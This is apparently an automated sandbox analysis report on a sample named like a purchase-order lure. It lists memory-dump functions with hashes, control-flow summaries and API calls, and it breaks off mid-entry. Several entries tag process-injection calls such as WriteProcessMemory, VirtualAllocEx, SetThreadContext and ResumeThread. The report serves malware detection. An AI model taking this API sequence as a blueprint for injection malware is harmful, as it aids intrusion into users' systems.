                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1437311328.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5700000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Create
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                      • Opcode ID: 167ccad280bee5eddde9599e936ddf9ee4f6a342a149d1394a6568b41d915717
                                                                                                                                                                      • Instruction ID: 716eb5d879fffa860b7e9bb3fb7410dabe5f135b7c26e1d41fe599c696f1a3ac
                                                                                                                                                                      • Opcode Fuzzy Hash: 167ccad280bee5eddde9599e936ddf9ee4f6a342a149d1394a6568b41d915717
                                                                                                                                                                      • Instruction Fuzzy Hash: F54100B1D0071ACFEB24CFA9C84478DBBF1BF48314F20816AD418AB291DB75694ACF60
                                                                                                                                                                      Function 05707BAC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1891 5707bac-57090b1 CreateActCtxA 1894 57090b3-57090b9 1891->1894 1895 57090ba-5709114 1891->1895 1894->1895 1902 5709123-5709127 1895->1902 1903 5709116-5709119 1895->1903 1904 5709138 1902->1904 1905 5709129-5709135 1902->1905 1903->1902 1907 5709139 1904->1907 1905->1904 1907->1907
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 057090A1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1437311328.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5700000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Create
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                      • Opcode ID: 9d9bd698775383b2229127e452d255a1ec57e043a957eff4fda5bde9a0793619
                                                                                                                                                                      • Instruction ID: 279a1b14f101b555b733f41e6d78c4fd98de31e5d8bf025cd9e3dce6f7e2e612
                                                                                                                                                                      • Opcode Fuzzy Hash: 9d9bd698775383b2229127e452d255a1ec57e043a957eff4fda5bde9a0793619
                                                                                                                                                                      • Instruction Fuzzy Hash: 4C41E2B1D0071DCBDB24DFA9C844B8EBBF5BF48314F20816AD508AB251DB75694ACF90
                                                                                                                                                                      Function 09AB9A34 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1924 9ab9a34-9abaa84 1926 9abaa8f-9abaa9e 1924->1926 1927 9abaa86-9abaa8c 1924->1927 1928 9abaaa3-9abaadc DrawTextExW 1926->1928 1929 9abaaa0 1926->1929 1927->1926 1930 9abaade-9abaae4 1928->1930 1931 9abaae5-9abab02 1928->1931 1929->1928 1930->1931
                                                                                                                                                                      APIs
                                                                                                                                                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,09ABAA1D,?,?), ref: 09ABAACF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1461531912.0000000009AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AB0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9ab0000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DrawText
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2175133113-0
                                                                                                                                                                      • Opcode ID: 33d8b77e859b21fbd4cdf1c60ea4f52f40a4c4b9790dc5f1e675f5d1664ab7bb
                                                                                                                                                                      • Instruction ID: 45437f0b0726320ceec96e45537c4f6e3bc8b0cdfea185d3bbb9df2c4bc5a063
                                                                                                                                                                      • Opcode Fuzzy Hash: 33d8b77e859b21fbd4cdf1c60ea4f52f40a4c4b9790dc5f1e675f5d1664ab7bb
                                                                                                                                                                      • Instruction Fuzzy Hash: C531F1B5D003099FDB10CF9AD984ADEBBF8EB48320F54842EE818A7310D774A904CFA0
                                                                                                                                                                      Function 09ABAA30 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1934 9abaa30-9abaa84 1935 9abaa8f-9abaa9e 1934->1935 1936 9abaa86-9abaa8c 1934->1936 1937 9abaaa3-9abaadc DrawTextExW 1935->1937 1938 9abaaa0 1935->1938 1936->1935 1939 9abaade-9abaae4 1937->1939 1940 9abaae5-9abab02 1937->1940 1938->1937 1939->1940
                                                                                                                                                                      APIs
                                                                                                                                                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,09ABAA1D,?,?), ref: 09ABAACF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1461531912.0000000009AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AB0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9ab0000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DrawText
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2175133113-0
                                                                                                                                                                      • Opcode ID: 19924c8cc91e000b5945f12e457b47ff1b8c851c717e58e774169d5bab79cf03
                                                                                                                                                                      • Instruction ID: e3173e5e8173aa1c794f57b96e99e801b6b041b71d5a07c916f5a30ff9306518
                                                                                                                                                                      • Opcode Fuzzy Hash: 19924c8cc91e000b5945f12e457b47ff1b8c851c717e58e774169d5bab79cf03
                                                                                                                                                                      • Instruction Fuzzy Hash: FC31E4B5D003499FDB10CF9AD980ADEBBF9FB48320F54842EE815A7210D7759945CFA0
                                                                                                                                                                      Function 0B50C848 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0B50C8E0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                                      • Opcode ID: e4f1edddd06985624f85e0530da4dbea249dc9bd206cf521db42ca041cf592c1
                                                                                                                                                                      • Instruction ID: a15b54bf2ebc917abddc536a57c292ab0a25fc5e8762dbc32c2de2950937859b
                                                                                                                                                                      • Opcode Fuzzy Hash: e4f1edddd06985624f85e0530da4dbea249dc9bd206cf521db42ca041cf592c1
                                                                                                                                                                      • Instruction Fuzzy Hash: FC2155B6D003099FDB10CFA9C881BDEBBF1FF48310F10852AE958A7280CB389940CB64
                                                                                                                                                                      Function 0B50C850 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0B50C8E0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                                      • Opcode ID: b14323e1b0e927f50be4df11110caabf9de22cd8fdbf3792cd114d28245cd467
                                                                                                                                                                      • Instruction ID: 065ec2f6511db484290f73f79058faa3b66a60be677a9ea084e7f3e78992867d
                                                                                                                                                                      • Opcode Fuzzy Hash: b14323e1b0e927f50be4df11110caabf9de22cd8fdbf3792cd114d28245cd467
                                                                                                                                                                      • Instruction Fuzzy Hash: B8212671D103499FDB10DFAAC881BDEBBF5FF48310F508529E918A7240CB789955CBA4
                                                                                                                                                                      Function 0B50C939 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0B50C9C0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                                                      • Opcode ID: 133f301ff60cc9001423421f6e634ad3555645213da5998c77133c76d08fd698
                                                                                                                                                                      • Instruction ID: 7647a2a6bdbebc5680d35c03c939b7421cda980d90808c3910c74996f1ee4ff2
                                                                                                                                                                      • Opcode Fuzzy Hash: 133f301ff60cc9001423421f6e634ad3555645213da5998c77133c76d08fd698
                                                                                                                                                                      • Instruction Fuzzy Hash: 6B21F672D007499FDB10DF9AD881BDEBBF5FF48320F508929E558A7240CB399901CBA4
                                                                                                                                                                      Function 0B50C6B0 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0B50C736
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                      • Opcode ID: 4cf8d953921e81cd509c90bd452e61d3808fd1b756fb87cdb376b48b92f33860
                                                                                                                                                                      • Instruction ID: 8b66dbc69b290c73e516c50db3881d9f54d6f2d46ceae0e2b354af9e914e9be0
                                                                                                                                                                      • Opcode Fuzzy Hash: 4cf8d953921e81cd509c90bd452e61d3808fd1b756fb87cdb376b48b92f33860
                                                                                                                                                                      • Instruction Fuzzy Hash: 0F214871D103098FDB20DFAAC4857AEBBF4EB48210F54842DD819A7280CB789945CFA0
                                                                                                                                                                      Function 0B50C940 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0B50C9C0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                                                      • Opcode ID: 39cf937639e757efd27648c0acd3c10f3c766e024cebf1212d1d4c98e3209761
                                                                                                                                                                      • Instruction ID: 7ef8df60df0c500ad13d77bf5dd803aff6758492991b1cd2f33993afca65f210
                                                                                                                                                                      • Opcode Fuzzy Hash: 39cf937639e757efd27648c0acd3c10f3c766e024cebf1212d1d4c98e3209761
                                                                                                                                                                      • Instruction Fuzzy Hash: 1D211971D003499FDB10DF9AC841BDEBBF5FF48310F508529E558A7240C7359901CBA4
                                                                                                                                                                      Function 0B50C6B8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0B50C736
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                      • Opcode ID: 1203aa035bf3530b3f27ca312e58e1af7ebe948da67625daf0e7798b274f8b58
                                                                                                                                                                      • Instruction ID: 151dec2db5318ea75362153c0a83c5df49343d66e16eb3a68b494c72638c4c8e
                                                                                                                                                                      • Opcode Fuzzy Hash: 1203aa035bf3530b3f27ca312e58e1af7ebe948da67625daf0e7798b274f8b58
                                                                                                                                                                      • Instruction Fuzzy Hash: 2C213771D003098FDB20DFAAC4857AEBBF4EB49220F54842ED819A7280CB789945CFA5
                                                                                                                                                                      Function 0B50C790 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0B50C7FE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: 55f451c82083e7b79e3a0394e00efe9dbdaf34382735087f8a22ae0b615710ad
                                                                                                                                                                      • Instruction ID: 804334c5165baab52227242a024e142b12511de15b2841961b855ef05022d56d
                                                                                                                                                                      • Opcode Fuzzy Hash: 55f451c82083e7b79e3a0394e00efe9dbdaf34382735087f8a22ae0b615710ad
                                                                                                                                                                      • Instruction Fuzzy Hash: AB112672D003499FDB20DFAAC845BDEBBF5EF48320F148419E915A7250CB759940CFA4
                                                                                                                                                                      Function 0B50C788 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0B50C7FE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: 395a137aa4e185392e7147a474771c7c480c83800daa331bd9b9c66a564c61cd
                                                                                                                                                                      • Instruction ID: ea27879644140ce4ff25c893e93083ebffb4cad8b5460249b5ce71f3b09cf75e
                                                                                                                                                                      • Opcode Fuzzy Hash: 395a137aa4e185392e7147a474771c7c480c83800daa331bd9b9c66a564c61cd
                                                                                                                                                                      • Instruction Fuzzy Hash: 97115676D003499FDB20DFA9C845BDEBBF5EF48320F248819E519A7250CB399901CFA4
                                                                                                                                                                      Function 0B50C600 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                      • Opcode ID: 8e5db7e886949427a4443a8664dfd0bb4baf6b92c0e5a7253fd715c01f22bb53
                                                                                                                                                                      • Instruction ID: 8bf588d997e427daea9895938054d650cfbce9a5b08117effb3588147997e68e
                                                                                                                                                                      • Opcode Fuzzy Hash: 8e5db7e886949427a4443a8664dfd0bb4baf6b92c0e5a7253fd715c01f22bb53
                                                                                                                                                                      • Instruction Fuzzy Hash: 681146B1D007489FDB20DFAAD445B9EBBF4EB48220F148519D519A7240CB39A945CBA4
                                                                                                                                                                      Function 0B50C608 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                      • Opcode ID: 5d48f5452783865133eb3d7185ec962954c8fbfd90b3a6cffc29bb94fe8fd8cf
                                                                                                                                                                      • Instruction ID: 325168e159435724025292b2244b9f0e61622a68f3ed33538b202c9e077a76c2
                                                                                                                                                                      • Opcode Fuzzy Hash: 5d48f5452783865133eb3d7185ec962954c8fbfd90b3a6cffc29bb94fe8fd8cf
                                                                                                                                                                      • Instruction Fuzzy Hash: B61136B1D003498FDB20DFAAC445B9EFBF5EB88320F248519D559A7340CB79A945CFA4
                                                                                                                                                                      Function 0570E5E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0570E646
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1437311328.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5700000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                      • Opcode ID: e03f24d4537a2f0fdd8a84a2db762afe11b22bc635a52ca1f77d9913d7f5bc9b
                                                                                                                                                                      • Instruction ID: fb2d63aa2bc7b73481271e8bd2d79f3afcb06346354d06ee22ccfb687556b99a
                                                                                                                                                                      • Opcode Fuzzy Hash: e03f24d4537a2f0fdd8a84a2db762afe11b22bc635a52ca1f77d9913d7f5bc9b
                                                                                                                                                                      • Instruction Fuzzy Hash: 6911D2B6D007498FDB14DF9AD444A9EFBF8AB48220F14842AD819A7250C375A545CFA5
                                                                                                                                                                      Function 0F26112A Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 0F26118D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1473741956.000000000F260000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F260000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_f260000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                      • Opcode ID: 98abb32a19b9a328cb214f05864f4f86eda3b9ea6c894240c22b50129f37af7b
                                                                                                                                                                      • Instruction ID: dac79f093c74e98dc9687fcf47e1d87fe95b473e1d4d712ca12c97ccc2a7c3a9
                                                                                                                                                                      • Opcode Fuzzy Hash: 98abb32a19b9a328cb214f05864f4f86eda3b9ea6c894240c22b50129f37af7b
                                                                                                                                                                      • Instruction Fuzzy Hash: E111D6B68103499FDB10DF9AD845BDEBFF8EB48720F108459E518A7250C375A954CFA1
                                                                                                                                                                      Function 0F261130 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 0F26118D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1473741956.000000000F260000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F260000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_f260000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                      • Opcode ID: 9ff7a43e7d37bd5ccf1ae092aa88bc568eaea40426f208a7f32abae2f6a597c7
                                                                                                                                                                      • Instruction ID: a877977c7a430ec0ba71b0e46a32e8dd364ba66250347f768c773ff59aa5cbbe
                                                                                                                                                                      • Opcode Fuzzy Hash: 9ff7a43e7d37bd5ccf1ae092aa88bc568eaea40426f208a7f32abae2f6a597c7
                                                                                                                                                                      • Instruction Fuzzy Hash: CB11D0B58003499FDB20DF9AD885BDEBBF8EB48320F10845AE518A7250C375A994CFA1
                                                                                                                                                                      Function 0300D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1419032279.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_300d000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: cc93338eee03e83497160f2aeeb96390368bf70a932a10658854e16b0958f29d
                                                                                                                                                                      • Instruction ID: 59787bf759e868f4ad664a24ea49970b03573ab56723f6842b79c97fa13e20e0
                                                                                                                                                                      • Opcode Fuzzy Hash: cc93338eee03e83497160f2aeeb96390368bf70a932a10658854e16b0958f29d
                                                                                                                                                                      • Instruction Fuzzy Hash: F9210371505240DFEB15DF94D9C0B2ABFA5FB88329F24C5A9EC090F296C336D456CAB2
                                                                                                                                                                      Function 0300D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1419032279.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_300d000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: adde4b1317e5eafb8dd3941413c52243a77e154de68585cfadc1b7e446e3e300
                                                                                                                                                                      • Instruction ID: 1edb97e971b10e21cfbdcd05a8b06150e5c9d8313ce072d9807704f66061c8af
                                                                                                                                                                      • Opcode Fuzzy Hash: adde4b1317e5eafb8dd3941413c52243a77e154de68585cfadc1b7e446e3e300
                                                                                                                                                                      • Instruction Fuzzy Hash: FD210371605204DFEB14DF54D9C0B2AFBA5FB88324F24C5A9E9090F696C336E456CAB2
                                                                                                                                                                      Function 0301D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1419351532.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_301d000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 24c43e9cc67a66c7b1b5f937a7f3618b287f40bc83a92a6a81ac61b0a3865ced
                                                                                                                                                                      • Instruction ID: 40ef4969e8a2f11706473ecd91ab32e44375cb44848d84fbf89e19ff8931df25
                                                                                                                                                                      • Opcode Fuzzy Hash: 24c43e9cc67a66c7b1b5f937a7f3618b287f40bc83a92a6a81ac61b0a3865ced
                                                                                                                                                                      • Instruction Fuzzy Hash: 79213471A04300EFDB05DF14D9C0B2AFBA5FB94314F24CAADE8094F282C336D826CA61
                                                                                                                                                                      Function 0301D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1419351532.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_301d000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: cf2de9543ae5e392663a07f51ad272ee532d58d928614226f659477a107e3387
                                                                                                                                                                      • Instruction ID: b22955f73cefc2681675765f90cd396bbe9e3321f7c907cd2b9afd0c60e3ee01
                                                                                                                                                                      • Opcode Fuzzy Hash: cf2de9543ae5e392663a07f51ad272ee532d58d928614226f659477a107e3387
                                                                                                                                                                      • Instruction Fuzzy Hash: E221F275605300DFDB16DF14D9C4B26BBA5FB84314F24C9ADD84A4B286C33AD867CA62
                                                                                                                                                                      Function 0301D007 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1419351532.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_301d000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ec79228be4102f3e969c91a5c63a5d5c716232fc81c48c790cf8b9197a9f8bbd
                                                                                                                                                                      • Instruction ID: 658b5fcccb42fe3770ff5f232de88418d311025849ad1d64c201e640f6545d44
                                                                                                                                                                      • Opcode Fuzzy Hash: ec79228be4102f3e969c91a5c63a5d5c716232fc81c48c790cf8b9197a9f8bbd
                                                                                                                                                                      • Instruction Fuzzy Hash: C5219F755093808FCB13CF24D990B15BFB1EB46214F28C5DAD8498F2A7C33A981ACB62
                                                                                                                                                                      Function 0300D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1419032279.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_300d000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
